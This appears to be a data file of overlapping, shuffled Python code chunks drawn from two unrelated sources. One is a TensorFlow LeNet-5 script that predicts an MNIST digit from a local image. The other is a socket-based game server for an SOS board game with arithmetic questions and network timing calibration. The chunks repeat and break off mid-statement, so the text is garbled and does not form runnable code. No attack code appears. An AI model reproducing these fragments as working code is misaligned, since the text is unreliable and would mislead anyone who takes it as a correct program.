"#eva = mnist_lenet5_forward.forward([image],False,None) #prediction = tf.argmax(y,1) saver = tf.train.Saver() with tf.Session(graph=g) as sess:",
"ema.variables_to_restore() # saver = tf.train.Saver(ema_restore) # # correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))",
"PIL import Image, ImageFilter import tensorflow as tf import matplotlib.pyplot as plt import",
"as g: x = tf.placeholder(tf.float32,[1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS]) #x = tf.placeholder(tf.float32, [None, 784])",
"[None, 784]) #ipt = imageprepare() #y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) #y = mnist_lenet5_forward.forward(x,False,None)",
"x = tf.placeholder(tf.float32,[ # [ipt], # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS]) # y_",
"tf.placeholder(tf.float32, [None, 784]) #ipt = imageprepare() #y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) #y =",
"# accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) #image = tf.image.decode_png('D:/workspace/machine-learning/mnist/img/origin-2.png') # image = tf.cast(image, tf.float32)",
"tf.train.get_checkpoint_state(mnist_lenet5_backward.MODEL_SAVE_PATH) saver.restore(sess, ckpt.model_checkpoint_path) reshaped_xs = np.reshape([result],( 1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS)) # reshaped_x =",
"for x in tv] #return np.asarray(im) return tva result=imageprepare() #x = tf.placeholder(tf.float32, [None,",
"mnist_lenet5_forward import numpy as np def imageprepare(): im = Image.open('D:/workspace/machine-learning/mnist/img/origin-9.png') plt.imshow(im) plt.show() #print(type(im.getdata()))",
"image = tf.cast(image, tf.float32) y_conv = mnist_lenet5_forward.forward(x,False,None) #eva = mnist_lenet5_forward.forward([image],False,None) #prediction = tf.argmax(y,1)",
"#prediction = tf.argmax(y,1) saver = tf.train.Saver() with tf.Session(graph=g) as sess: init_op = tf.global_variables_initializer()",
"mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS)) # reshaped_x = np.reshape([ipt],( # [ipt], # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, #",
"def imageprepare(): im = Image.open('D:/workspace/machine-learning/mnist/img/origin-9.png') plt.imshow(im) plt.show() #print(type(im.getdata())) tv = list(im.getdata()) tva =",
"# mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS)) # accuracy_score = sess.run(accuracy, feed_dict={x:reshaped_x,y_:[2]}) prediction=tf.argmax(y_conv,1) predint=prediction.eval(feed_dict={x:",
"on Thu Nov 7 21:27:18 2019 @author: biyef \"\"\" from PIL import Image,",
"= tf.train.Saver(ema_restore) # # correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1)) # accuracy =",
"mnist_lenet5_forward.OUTPUT_NODE]) # y = mnist_lenet5_forward.forward(x,False,None) # # ema = tf.train.ExponentialMovingAverage(mnist_lenet5_backward.MOVING_AVERAGE_DECAY) # ema_restore =",
"7 21:27:18 2019 @author: biyef \"\"\" from PIL import Image, ImageFilter import tensorflow",
"y_conv = mnist_lenet5_forward.forward(x,False,None) #eva = mnist_lenet5_forward.forward([image],False,None) #prediction = tf.argmax(y,1) saver = tf.train.Saver() with",
"tf.Session(graph=g) as sess: init_op = tf.global_variables_initializer() sess.run(init_op) ckpt = tf.train.get_checkpoint_state(mnist_lenet5_backward.MODEL_SAVE_PATH) saver.restore(sess, ckpt.model_checkpoint_path) reshaped_xs",
"imageprepare() #y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) #y = mnist_lenet5_forward.forward(x,False,None) # x = tf.placeholder(tf.float32,[",
"#x = result with tf.Graph().as_default() as g: x = tf.placeholder(tf.float32,[1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS])",
"plt.imshow(im) plt.show() #print(type(im.getdata())) tv = list(im.getdata()) tva = [(255-x)*1.0/255.0 for x in tv]",
"as plt import mnist_lenet5_backward import mnist_lenet5_forward import numpy as np def imageprepare(): im",
"tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) #y = mnist_lenet5_forward.forward(x,False,None) # x = tf.placeholder(tf.float32,[ # [ipt], #",
"mnist_lenet5_backward import mnist_lenet5_forward import numpy as np def imageprepare(): im = Image.open('D:/workspace/machine-learning/mnist/img/origin-9.png') plt.imshow(im)",
"# ema_restore = ema.variables_to_restore() # saver = tf.train.Saver(ema_restore) # # correct_prediction = tf.equal(tf.argmax(y,",
"# image = tf.cast(image, tf.float32) y_conv = mnist_lenet5_forward.forward(x,False,None) #eva = mnist_lenet5_forward.forward([image],False,None) #prediction =",
"saver = tf.train.Saver() with tf.Session(graph=g) as sess: init_op = tf.global_variables_initializer() sess.run(init_op) ckpt =",
"from PIL import Image, ImageFilter import tensorflow as tf import matplotlib.pyplot as plt",
"list(im.getdata()) tva = [(255-x)*1.0/255.0 for x in tv] #return np.asarray(im) return tva result=imageprepare()",
"# y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) # y = mnist_lenet5_forward.forward(x,False,None) # # ema",
"= tf.placeholder(tf.float32,[1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS]) #x = tf.placeholder(tf.float32, [None, 784]) #ipt = imageprepare()",
"import tensorflow as tf import matplotlib.pyplot as plt import mnist_lenet5_backward import mnist_lenet5_forward import",
"#image = tf.image.decode_png('D:/workspace/machine-learning/mnist/img/origin-2.png') # image = tf.cast(image, tf.float32) y_conv = mnist_lenet5_forward.forward(x,False,None) #eva =",
"utf-8 -*- \"\"\" Created on Thu Nov 7 21:27:18 2019 @author: biyef \"\"\"",
"# saver = tf.train.Saver(ema_restore) # # correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1)) #",
"= tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) #y = mnist_lenet5_forward.forward(x,False,None) # x = tf.placeholder(tf.float32,[ # [ipt],",
"# mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS]) # y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) #",
"# # ema = tf.train.ExponentialMovingAverage(mnist_lenet5_backward.MOVING_AVERAGE_DECAY) # ema_restore = ema.variables_to_restore() # saver = tf.train.Saver(ema_restore)",
"reshaped_x = np.reshape([ipt],( # [ipt], # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS)) # accuracy_score",
"# correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1)) # accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) #image",
"matplotlib.pyplot as plt import mnist_lenet5_backward import mnist_lenet5_forward import numpy as np def imageprepare():",
"y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) # y = mnist_lenet5_forward.forward(x,False,None) # # ema =",
"x in tv] #return np.asarray(im) return tva result=imageprepare() #x = tf.placeholder(tf.float32, [None, 784])",
"[None, 784]) #x = result with tf.Graph().as_default() as g: x = tf.placeholder(tf.float32,[1, mnist_lenet5_forward.IMAGE_SIZE,",
"reshaped_xs = np.reshape([result],( 1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS)) # reshaped_x = np.reshape([ipt],( # [ipt],",
"#print(type(im.getdata())) tv = list(im.getdata()) tva = [(255-x)*1.0/255.0 for x in tv] #return np.asarray(im)",
"mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS)) # accuracy_score = sess.run(accuracy, feed_dict={x:reshaped_x,y_:[2]}) prediction=tf.argmax(y_conv,1) predint=prediction.eval(feed_dict={x: reshaped_xs}, session=sess) print('recognize",
"sess: init_op = tf.global_variables_initializer() sess.run(init_op) ckpt = tf.train.get_checkpoint_state(mnist_lenet5_backward.MODEL_SAVE_PATH) saver.restore(sess, ckpt.model_checkpoint_path) reshaped_xs = np.reshape([result],(",
"np.reshape([result],( 1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS)) # reshaped_x = np.reshape([ipt],( # [ipt], # mnist_lenet5_forward.IMAGE_SIZE,",
"as tf import matplotlib.pyplot as plt import mnist_lenet5_backward import mnist_lenet5_forward import numpy as",
"[ipt], # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS]) # y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE])",
"\"\"\" from PIL import Image, ImageFilter import tensorflow as tf import matplotlib.pyplot as",
"# # correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1)) # accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))",
"= tf.train.Saver() with tf.Session(graph=g) as sess: init_op = tf.global_variables_initializer() sess.run(init_op) ckpt = tf.train.get_checkpoint_state(mnist_lenet5_backward.MODEL_SAVE_PATH)",
"ckpt.model_checkpoint_path) reshaped_xs = np.reshape([result],( 1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS)) # reshaped_x = np.reshape([ipt],( #",
"= np.reshape([result],( 1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS)) # reshaped_x = np.reshape([ipt],( # [ipt], #",
"import numpy as np def imageprepare(): im = Image.open('D:/workspace/machine-learning/mnist/img/origin-9.png') plt.imshow(im) plt.show() #print(type(im.getdata())) tv",
"import Image, ImageFilter import tensorflow as tf import matplotlib.pyplot as plt import mnist_lenet5_backward",
"-*- coding: utf-8 -*- \"\"\" Created on Thu Nov 7 21:27:18 2019 @author:",
"ema_restore = ema.variables_to_restore() # saver = tf.train.Saver(ema_restore) # # correct_prediction = tf.equal(tf.argmax(y, 1),",
"\"\"\" Created on Thu Nov 7 21:27:18 2019 @author: biyef \"\"\" from PIL",
"tf.Graph().as_default() as g: x = tf.placeholder(tf.float32,[1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS]) #x = tf.placeholder(tf.float32, [None,",
"tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1)) # accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) #image = tf.image.decode_png('D:/workspace/machine-learning/mnist/img/origin-2.png') #"
] |
[
"move(self, id, move): with self.lock: if self.game.state != GameState.MOVE or self.game.turn != id:",
"conn.sendall(string_to_byte(message) + self.SPECIAL_KEYWORD) for i in range(10): for idx, conn in enumerate(self.active_connections): if",
"\", ping1 * 1000, \" ms\") self.ping_difference = ping0 - ping1 self.game.wait_times =",
"with self.lock: self.active_connections[id] = None self.game.players_names[id] = None self.game.reset_board() self.calibration_acks = [[], []]",
"{duration} seconds\") with self.lock: if self.game.state != GameState.QUESTION or self.game.question_uuid != question_uuid: return",
"random.randint(1, limit) number_2 = random.randint(1, limit) question = str(number_1) + operator + str(number_2)",
"GameState.MOVE if self.answer_ts[1-id] and self.answer_ts[1-id] < self.answer_ts[id]: self.game.turn = 1 - id else:",
"the Question: \" + question + \" / UUID: \" + self.game.question_uuid) def",
"self.received_acks_cnt[1 - id] == 10: self.update_time_difference() ready_to_start = True if ready_to_start: self.generate_question() self.notify_players()",
"self.calibration_acks = [[], []] self.calibrations = [[{} for _ in range(10)], [{} for",
"between timestamps of player 0 and 1. self.received_acks_cnt = [0, 0] self.ping_difference =",
"class GameController(): SPECIAL_KEYWORD = b\"xaxaxayarmaW\" MAX_RECEIVE_TIME_DIFFERENCE = 0.010 # in seconds def __init__(self):",
"[0, 0] self.ping_difference = 0 self.notify_players() def restart_game(self): with self.lock: self.game.reset_board() self.generate_question() self.notify_players()",
"self.answer_ts[1 - id]: time.sleep(abs(2 * self.ping_difference)) with self.lock: self.game.state = GameState.MOVE if self.answer_ts[1-id]",
"if conn: conn.close() def calculate_score(self, id, coordinate_x, coordinate_y, character): directions = [[-1, 0],",
"= 0.010 # in seconds def __init__(self): self.active_connections = [None, None] self.game =",
"range(coordinate_y - 1, coordinate_y + 2): for direction in directions: sequence = \"\"",
"if self.game.question_uuid != uuid: return if self.receive_question_ts[1 - id]: if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE:",
"def close_connections(self): for conn in self.active_connections: if conn: conn.close() def calculate_score(self, id, coordinate_x,",
"x in range(coordinate_x - 1, coordinate_x + 2): for y in range(coordinate_y -",
"in self.active_connections: if conn: conn.close() def calculate_score(self, id, coordinate_x, coordinate_y, character): directions =",
"\"*\"] operator = random.choice(operator_list) limit = 20 if operator == \"*\" else 100",
"self.ts_difference = 0 self.received_acks_cnt = [0, 0] self.ping_difference = 0 self.notify_players() def restart_game(self):",
"coordinate_x, coordinate_y, character = move self.calculate_score(id, coordinate_x, coordinate_y, character) self.generate_question() self.notify_players() def give_turn(self,",
"print(\"Sending Game information to the all players\") def connection_thread(self, conn, id): if self.game.state",
"else: return else: return time.sleep(0.2) with self.lock: if self.game.question_uuid != uuid: return if",
"= answer self.game.question_uuid = str(uuid.uuid4()) self.receive_question_ts = [None, None] self.both_players_received = False self.answer_ts",
"client_send_ts, ack_id): self.calibrations[id][ack_id][\"server_rec\"] = time.time() self.calibrations[id][ack_id][\"client_rec\"] = client_rec_ts self.calibrations[id][ack_id][\"client_send\"] = client_send_ts ready_to_start =",
"conn): id = 1 if self.active_connections[0] == None: id = 0 self.active_connections[id] =",
"ms\") self.ping_difference = ping0 - ping1 self.game.wait_times = [max(0, -self.ping_difference), max(0, self.ping_difference)] delta0",
"False self.answer_ts = [None, None] print(\"Generated the Question: \" + question + \"",
"/ 2 for c in self.calibrations[1][-6:]]) / 6 print(\"Player 0 has a ping:",
"= [max(0, -self.ping_difference), max(0, self.ping_difference)] delta0 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for c in",
"\" ms\") print(\"Player 1 has a ping: \", ping1 * 1000, \" ms\")",
"= [None, None] self.game = Game(4, 4) self.lock = threading.Lock() self.receive_question_ts = [None,",
"sequence == \"SOS\" and sequence_coordinates not in self.game.complete_lines: self.game.scores[id] += 1 self.game.complete_lines.append(sequence_coordinates) for",
"self.answer_ts[1-id] and self.answer_ts[1-id] < self.answer_ts[id]: self.game.turn = 1 - id else: self.game.turn =",
"= sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for c in self.calibrations[1][-6:]]) / 6 self.ts_difference = delta0",
"limit = 20 if operator == \"*\" else 100 number_1 = random.randint(1, limit)",
"self.received_acks_cnt[id] == 10 and self.received_acks_cnt[1 - id] == 10: self.update_time_difference() ready_to_start = True",
"0], [-1, -1], [0, -1], [1, -1]] with self.lock: self.game.board[coordinate_x][coordinate_y] = character for",
"None] print(\"Generated the Question: \" + question + \" / UUID: \" +",
"= id self.notify_players() # Returns the normalized timestamp difference between acknowledgment of two",
"self.game.players_names[1 - id] != None: ready = True if ready: threading.Thread(target=calibrate_timestamps, args=(self,), daemon=True).start()",
"c in self.calibrations[0][-6:]]) / 6 ping1 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for c in",
"c in self.calibrations[1][-6:]]) / 6 self.ts_difference = delta0 - delta1 print(\"Calculated time difference",
"self.calibrations[id][ack_id][\"client_rec\"] = client_rec_ts self.calibrations[id][ack_id][\"client_send\"] = client_send_ts ready_to_start = False with self.lock: self.received_acks_cnt[id] +=",
"send_id(self, id): conn = self.active_connections[id] message = { \"TYPE\": \"ID\", \"PAYLOAD\": id }",
"time sys.path.append('..') from game import Game, GameState from utils import string_to_byte, byte_to_string class",
"print(\"Player 0 has a ping: \", ping0 * 1000, \" ms\") print(\"Player 1",
"the question \" + uuid) self.both_players_received = True return else: return else: return",
"\"CALIBRATION\", \"PAYLOAD\": str(i)}) self.calibrations[id][i][\"server_send\"] = time.time() conn.sendall(string_to_byte(message) + self.SPECIAL_KEYWORD) for i in range(10):",
"from utils import string_to_byte, byte_to_string class GameController(): SPECIAL_KEYWORD = b\"xaxaxayarmaW\" MAX_RECEIVE_TIME_DIFFERENCE = 0.010",
"= move self.calculate_score(id, coordinate_x, coordinate_y, character) self.generate_question() self.notify_players() def give_turn(self, id, question_uuid, duration):",
"self.lock: self.game.players_names[id] = name self.send_id(id) if self.game.players_names[1 - id] != None: ready =",
"notify_players(self): print(\"Sending Game information to the all players\") def connection_thread(self, conn, id): if",
"conn: threading.Thread(target=connection_thread, args=(self, conn, idx), daemon=True).start() def generate_question(self): print(\"Generating New Question...\") operator_list =",
"- (i - 1) * direction[0], y - (i - 1) * direction[1]])",
"self.calibrations[0][-6:]]) / 6 delta1 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for c in self.calibrations[1][-6:]]) /",
"= time.time() self.ts_info[id][uuid][\"client_rec\"] = client_rec self.ts_info[id][uuid][\"client_send\"] = client_send with self.lock: if self.game.state !=",
"import threading import pickle import json import sys import random import uuid import",
"uuid) self.add_new_calibration_ts(uuid) return else: self.add_new_calibration_ts(uuid) self.generate_question() self.notify_players() def add_new_calibration_ts(self, uuid): self.calibrations[0].append(self.ts_info[0][uuid]) self.calibrations[0] =",
"in self.calibrations[1][-6:]]) / 6 self.ts_difference = delta0 - delta1 print(\"Calculated time difference in",
"in enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread, args=(self, conn, idx, i), daemon=True).start() time.sleep(0.2) with self.lock:",
"self.game.question = question self.game.answer = answer self.game.question_uuid = str(uuid.uuid4()) self.receive_question_ts = [None, None]",
"MAX_RECEIVE_TIME_DIFFERENCE = 0.010 # in seconds def __init__(self): self.active_connections = [None, None] self.game",
"all players\") def connection_thread(self, conn, id): if self.game.state == GameState.QUESTION: self.ts_info[id][self.game.question_uuid] = {}",
"and self.answer_ts[1-id] < self.answer_ts[id]: self.game.turn = 1 - id else: self.game.turn = id",
"print(f\"Sending ID to the Player {id}\") conn.sendall(string_to_byte(json.dumps(message)) + self.SPECIAL_KEYWORD) def close_connections(self): for conn",
"player 0 and 1. self.received_acks_cnt = [0, 0] self.ping_difference = 0 self.ts_info =",
"ping0 - ping1 self.game.wait_times = [max(0, -self.ping_difference), max(0, self.ping_difference)] delta0 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) /",
"difference between timestamps of player 0 and 1. self.received_acks_cnt = [0, 0] self.ping_difference",
"= client_rec if self.receive_question_ts[1 - id]: if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: print(\"Both player has",
"self.generate_question() self.notify_players() def give_turn(self, id, question_uuid, duration): print(f\"Player {id} duration: {duration} seconds\") with",
"if not self.answer_ts[1 - id]: time.sleep(abs(2 * self.ping_difference)) with self.lock: self.game.state = GameState.MOVE",
"* 1000, \" ms\") self.ping_difference = ping0 - ping1 self.game.wait_times = [max(0, -self.ping_difference),",
"self.game.board[coordinate_x][coordinate_y] = character for x in range(coordinate_x - 1, coordinate_x + 2): for",
"100 number_1 = random.randint(1, limit) number_2 = random.randint(1, limit) question = str(number_1) +",
"in self.calibrations[0][-6:]]) / 6 ping1 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for c in self.calibrations[1][-6:]])",
"the Player {id}\") conn.sendall(string_to_byte(json.dumps(message)) + self.SPECIAL_KEYWORD) def close_connections(self): for conn in self.active_connections: if",
"with self.lock: self.game.state = GameState.MOVE if self.answer_ts[1-id] and self.answer_ts[1-id] < self.answer_ts[id]: self.game.turn =",
"[{}, {}] self.answer_ts = [None, None] def add_connection(self, conn): id = 1 if",
"conn in enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread, args=(self, conn, idx), daemon=True).start() def generate_question(self): print(\"Generating",
"[None, None] def add_connection(self, conn): id = 1 if self.active_connections[0] == None: id",
"idx, conn in enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread, args=(self, conn, idx), daemon=True).start() def generate_question(self):",
"self.game.turn = id self.notify_players() # Returns the normalized timestamp difference between acknowledgment of",
"id self.notify_players() # Returns the normalized timestamp difference between acknowledgment of two players",
"= GameState.QUESTION self.game.question = question self.game.answer = answer self.game.question_uuid = str(uuid.uuid4()) self.receive_question_ts =",
"/ 6 delta1 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for c in self.calibrations[1][-6:]]) / 6",
"= str(uuid.uuid4()) self.receive_question_ts = [None, None] self.both_players_received = False self.answer_ts = [None, None]",
"= {} self.ts_info[id][self.game.question_uuid][\"server_send\"] = time.time() conn.sendall(pickle.dumps(self.game) + self.SPECIAL_KEYWORD) for idx, conn in enumerate(self.active_connections):",
"= client_rec_ts self.calibrations[id][ack_id][\"client_send\"] = client_send_ts ready_to_start = False with self.lock: self.received_acks_cnt[id] += 1",
"self.active_connections[id] message = { \"TYPE\": \"ID\", \"PAYLOAD\": id } print(f\"Sending ID to the",
"else: self.game.turn = id self.notify_players() # Returns the normalized timestamp difference between acknowledgment",
"= 20 if operator == \"*\" else 100 number_1 = random.randint(1, limit) number_2",
"the all players\") def connection_thread(self, conn, id): if self.game.state == GameState.QUESTION: self.ts_info[id][self.game.question_uuid] =",
"= [{}, {}] self.answer_ts = [None, None] def add_connection(self, conn): id = 1",
"if self.answer_ts[1-id] and self.answer_ts[1-id] < self.answer_ts[id]: self.game.turn = 1 - id else: self.game.turn",
"sys import random import uuid import time sys.path.append('..') from game import Game, GameState",
"= None self.game.reset_board() self.calibration_acks = [[], []] self.calibrations = [[{} for _ in",
"= client_send with self.lock: if self.game.state != GameState.QUESTION: return if self.game.question_uuid == uuid:",
"with self.lock: if self.game.question_uuid != uuid: return if self.receive_question_ts[1 - id]: if self.get_timestamp_diff()",
"ID to the Player {id}\") conn.sendall(string_to_byte(json.dumps(message)) + self.SPECIAL_KEYWORD) def close_connections(self): for conn in",
"has received the question \" + uuid) self.add_new_calibration_ts(uuid) return else: self.add_new_calibration_ts(uuid) self.generate_question() self.notify_players()",
"= { \"TYPE\": \"ID\", \"PAYLOAD\": id } print(f\"Sending ID to the Player {id}\")",
"sequence_coordinates.append([x - (i - 1) * direction[0], y - (i - 1) *",
"direction[0], y - (i - 1) * direction[1]]) if sequence_coordinates[-1][0] < 0 or",
"(i - 1) * direction[0], y - (i - 1) * direction[1]]) if",
"operator = random.choice(operator_list) limit = 20 if operator == \"*\" else 100 number_1",
"1, coordinate_y + 2): for direction in directions: sequence = \"\" sequence_coordinates =",
"if self.game.question_uuid == uuid: self.receive_question_ts[id] = client_rec if self.receive_question_ts[1 - id]: if self.get_timestamp_diff()",
"= True print(\"Both player has received the question \" + uuid) self.add_new_calibration_ts(uuid) return",
"= random.randint(1, limit) number_2 = random.randint(1, limit) question = str(number_1) + operator +",
"or self.game.question_uuid != question_uuid: return self.answer_ts[id] = duration if self.answer_ts[1 - id]: return",
"self.lock: self.game.state = GameState.MOVE if self.answer_ts[1-id] and self.answer_ts[1-id] < self.answer_ts[id]: self.game.turn = 1",
"id): conn = self.active_connections[id] message = { \"TYPE\": \"ID\", \"PAYLOAD\": id } print(f\"Sending",
"args=(self,), daemon=True).start() def notify_players(self): print(\"Sending Game information to the all players\") def connection_thread(self,",
"client_rec, client_send, uuid): self.ts_info[id][uuid][\"server_rec\"] = time.time() self.ts_info[id][uuid][\"client_rec\"] = client_rec self.ts_info[id][uuid][\"client_send\"] = client_send with",
"6 self.ts_difference = delta0 - delta1 print(\"Calculated time difference in seconds is: \",",
"range(3): sequence_coordinates.append([x - (i - 1) * direction[0], y - (i - 1)",
"if sequence == \"SOS\" and sequence_coordinates not in self.game.complete_lines: self.game.scores[id] += 1 self.game.complete_lines.append(sequence_coordinates)",
"direction in directions: sequence = \"\" sequence_coordinates = [] for i in range(3):",
"self.MAX_RECEIVE_TIME_DIFFERENCE: self.both_players_received = True print(\"Both player has received the question \" + uuid)",
"sequence = \"NOO\" break sequence += self.game.board[sequence_coordinates[-1][0]][sequence_coordinates[-1][1]] if sequence == \"SOS\" and sequence_coordinates",
"coordinate_y, character = move self.calculate_score(id, coordinate_x, coordinate_y, character) self.generate_question() self.notify_players() def give_turn(self, id,",
"print(f\"Player {id} duration: {duration} seconds\") with self.lock: if self.game.state != GameState.QUESTION or self.game.question_uuid",
"self.add_new_calibration_ts(uuid) self.generate_question() self.notify_players() def add_new_calibration_ts(self, uuid): self.calibrations[0].append(self.ts_info[0][uuid]) self.calibrations[0] = self.calibrations[0][1:] self.calibrations[1].append(self.ts_info[1][uuid]) self.calibrations[1] =",
"in directions: sequence = \"\" sequence_coordinates = [] for i in range(3): sequence_coordinates.append([x",
"range(10): for idx, conn in enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread, args=(self, conn, idx, i),",
"{}] self.answer_ts = [None, None] def add_connection(self, conn): id = 1 if self.active_connections[0]",
"SPECIAL_KEYWORD = b\"xaxaxayarmaW\" MAX_RECEIVE_TIME_DIFFERENCE = 0.010 # in seconds def __init__(self): self.active_connections =",
"self.answer_ts = [None, None] def add_connection(self, conn): id = 1 if self.active_connections[0] ==",
"None] def add_connection(self, conn): id = 1 if self.active_connections[0] == None: id =",
"break sequence += self.game.board[sequence_coordinates[-1][0]][sequence_coordinates[-1][1]] if sequence == \"SOS\" and sequence_coordinates not in self.game.complete_lines:",
"self.game.col + coordinate[1]) def move(self, id, move): with self.lock: if self.game.state != GameState.MOVE",
"ping0 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for c in self.calibrations[0][-6:]]) / 6 ping1 =",
"and self.received_acks_cnt[1 - id] == 10: self.update_time_difference() ready_to_start = True if ready_to_start: self.generate_question()",
"answer self.game.question_uuid = str(uuid.uuid4()) self.receive_question_ts = [None, None] self.both_players_received = False self.answer_ts =",
"conn in enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread, args=(self, conn, idx, i), daemon=True).start() time.sleep(0.2) with",
"return coordinate_x, coordinate_y, character = move self.calculate_score(id, coordinate_x, coordinate_y, character) self.generate_question() self.notify_players() def",
"self.game.question_uuid != question_uuid: return self.answer_ts[id] = duration if self.answer_ts[1 - id]: return if",
"idx), daemon=True).start() def generate_question(self): print(\"Generating New Question...\") operator_list = [\"+\", \"-\", \"*\"] operator",
"self.receive_question_ts = [None, None] self.both_players_received = False self.calibration_acks = [[], []] self.calibrations =",
"20 if operator == \"*\" else 100 number_1 = random.randint(1, limit) number_2 =",
"range(10)], [{} for _ in range(10)]] self.ts_difference = 0 # Average difference between",
"= GameState.MOVE if self.answer_ts[1-id] and self.answer_ts[1-id] < self.answer_ts[id]: self.game.turn = 1 - id",
"check_question_ack(self, id, client_rec, client_send, uuid): self.ts_info[id][uuid][\"server_rec\"] = time.time() self.ts_info[id][uuid][\"client_rec\"] = client_rec self.ts_info[id][uuid][\"client_send\"] =",
"self.game.wait_times = [max(0, -self.ping_difference), max(0, self.ping_difference)] delta0 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for c",
"ms\") print(\"Player 1 has a ping: \", ping1 * 1000, \" ms\") self.ping_difference",
"0 or \\ sequence_coordinates[-1][0] >= self.game.row or sequence_coordinates[-1][1] >= self.game.col: sequence = \"NOO\"",
">= self.game.row or sequence_coordinates[-1][1] >= self.game.col: sequence = \"NOO\" break sequence += self.game.board[sequence_coordinates[-1][0]][sequence_coordinates[-1][1]]",
"self.lock: if self.game.state != GameState.MOVE or self.game.turn != id: # or not self.both_players_received:",
"of two players in seconds. def get_timestamp_diff(self): return abs(self.receive_question_ts[0] - self.receive_question_ts[1] - self.ts_difference",
"self.add_new_calibration_ts(uuid) return else: self.add_new_calibration_ts(uuid) self.generate_question() self.notify_players() def add_new_calibration_ts(self, uuid): self.calibrations[0].append(self.ts_info[0][uuid]) self.calibrations[0] = self.calibrations[0][1:]",
"print(\"Player 1 has a ping: \", ping1 * 1000, \" ms\") self.ping_difference =",
"id): with self.lock: self.active_connections[id] = None self.game.players_names[id] = None self.game.reset_board() self.calibration_acks = [[],",
"\" / UUID: \" + self.game.question_uuid) def send_id(self, id): conn = self.active_connections[id] message",
"str(eval(question)) with self.lock: self.game.state = GameState.QUESTION self.game.question = question self.game.answer = answer self.game.question_uuid",
"number_2 = random.randint(1, limit) question = str(number_1) + operator + str(number_2) answer =",
"for y in range(coordinate_y - 1, coordinate_y + 2): for direction in directions:",
"self.lock: if self.game.state != GameState.QUESTION or self.game.question_uuid != question_uuid: return self.answer_ts[id] = duration",
"client_send_ts ready_to_start = False with self.lock: self.received_acks_cnt[id] += 1 if self.received_acks_cnt[id] == 10",
